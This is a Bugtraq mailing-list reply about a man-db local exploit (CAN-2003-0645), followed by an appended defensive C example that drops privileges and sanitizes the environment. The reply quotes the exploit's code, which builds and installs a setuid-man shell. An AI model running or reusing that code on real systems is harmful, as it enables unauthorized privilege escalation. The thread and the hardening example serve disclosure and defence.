Bugtraq mailing list archives
Re: man-db[v2.4.1-]: open_cat_stream() privileged call exploit.
From: Colin Watson <cjwatson () debian org>
Date: Fri, 08 Aug 2003 11:19:07 +0100
In article <20030806082358.2564.qmail () www securityfocus com>, Vade 79 wrote:
# man-db[v2.4.1-]: local uid=man exploit.
Correction: 2.3.12 (a beta release) and 2.3.18 to 2.4.1.
echo "[*] making runme, and mansh source files..."
cat <<EOF>runme.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
/* runs as uid=man from the privileged call in open_cat_stream();
 * make the real uid match the effective one so the shell started by
 * system() keeps it, then build and install a setuid-man shell */
int main(int argc,char **argv){
  setreuid(geteuid(),geteuid());
  system("cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh");
  chmod("${TMPDIR}/mansh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
  unlink(argv[0]);
  exit(0);
}
EOF
cat <<EOF>mansh.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
/* setuid-man shell: again make the real uid follow the effective uid
 * before exec'ing sh, so sh does not drop it */
int main(){
  setreuid(geteuid(),geteuid());
  execl("/bin/sh","sh",(char *)0);
  exit(0);
}
EOF
It can be done with a lot less effort and in about a tenth of the space
without resorting to compiled code, but I'll leave that as an exercise for
the reader ... :-)

Anyway, Debian man-db 2.3.20-18.woody.2 (stable) and 2.4.1-12 (unstable)
fix this. I'm working to release 2.4.2 as well.

This is CAN-2003-0645.

-- 
Colin Watson                                  [cjwatson () debian org]
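Added example for this thread; it is not code from the original post, from
Colin's reply, or from man-db itself. The exploit above works because a
setuid program ran an external command while still privileged and with the
caller's environment (here ${TMPDIR}) intact; runme.c's first line,
setreuid(geteuid(),geteuid()), exists because a shell such as bash started by
system() resets its effective uid to the real uid when the two differ, so the
exploit makes them equal before anything else runs. The hardened pattern
below is the defensive counterpart: drop all three uids to the real uid and
verify the drop, build an allow-listed environment with a fixed PATH, and
execve() the helper directly instead of going through system(). Function
names (drop_privileges_permanently, build_safe_env, run_unprivileged) are
this example's own, and it assumes Linux/BSD setreuid() semantics (setting
the real uid also rewrites the saved uid).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

extern char **environ;

/* Give up the elevated effective uid for good: real, effective and saved
 * uid all become the real uid.  For an unprivileged caller, setting the
 * real uid through setreuid() also rewrites the saved uid (Linux and BSD
 * semantics), so a later setuid()/seteuid() cannot get the old euid back.
 * Returns 0 when the drop is verified, -1 otherwise. */
int drop_privileges_permanently(void)
{
    uid_t ruid = getuid();

    if (setreuid(ruid, ruid) != 0)
        return -1;
    if (geteuid() != ruid)            /* effective uid did not change */
        return -1;
    if (ruid != 0 && setuid(0) == 0)  /* a non-root user regained root */
        return -1;
    return 0;
}

/* Build an allow-listed environment for a helper program.  PATH is always
 * replaced by a fixed value, so the helper ("cc", a pager, a compressor)
 * cannot be resolved through an attacker's directory, and TMPDIR, IFS,
 * LD_* and everything else not listed is dropped.  Writes at most max-1
 * entries plus a NULL terminator; returns the number of entries. */
size_t build_safe_env(char *const *in, const char **out, size_t max)
{
    static const char *const allow[] = { "TERM", "LANG", "LC_ALL", NULL };
    size_t n = 0;

    if (max < 2) {
        if (max)
            out[0] = NULL;
        return 0;
    }
    out[n++] = "PATH=/usr/bin:/bin";
    for (; *in != NULL && n + 1 < max; in++) {
        const char *eq = strchr(*in, '=');
        if (eq == NULL)
            continue;
        size_t klen = (size_t)(eq - *in);
        for (const char *const *a = allow; *a != NULL; a++) {
            if (strlen(*a) == klen && strncmp(*a, *in, klen) == 0) {
                out[n++] = *in;
                break;
            }
        }
    }
    out[n] = NULL;
    return n;
}

/* Run an absolute program path as the real user, with the sanitized
 * environment, and without going through /bin/sh -c.  Returns the child's
 * exit status, or -1 if it could not be run. */
int run_unprivileged(char *const argv[], char *const *caller_env)
{
    const char *env[64];
    int status;
    pid_t pid;

    build_safe_env(caller_env, env, sizeof env / sizeof env[0]);
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges_permanently() != 0)
            _exit(126);               /* refuse to run still privileged */
        execve(argv[0], argv, (char *const *)env);
        _exit(127);                   /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Show what a helper sees: the uid it runs as, the fixed PATH, and
     * that the caller's TMPDIR never reached it. */
    char *const argv[] = { "/bin/sh", "-c",
                           "id -u; echo \"PATH=$PATH TMPDIR=$TMPDIR\"", NULL };
    int rc = run_unprivileged(argv, environ);

    printf("helper exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

The order matters: the uid drop happens in the child before execve(), so
even if the helper is itself a shell it starts with real, effective and
saved uid all equal to the caller's, and there is nothing left for a
setreuid(geteuid(),geteuid()) trick to keep.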
Current thread:
- man-db[v2.4.1-]: open_cat_stream() privileged call exploit. Vade 79 (Aug 06)
- Re: man-db[v2.4.1-]: open_cat_stream() privileged call exploit. Colin Watson (Aug 08)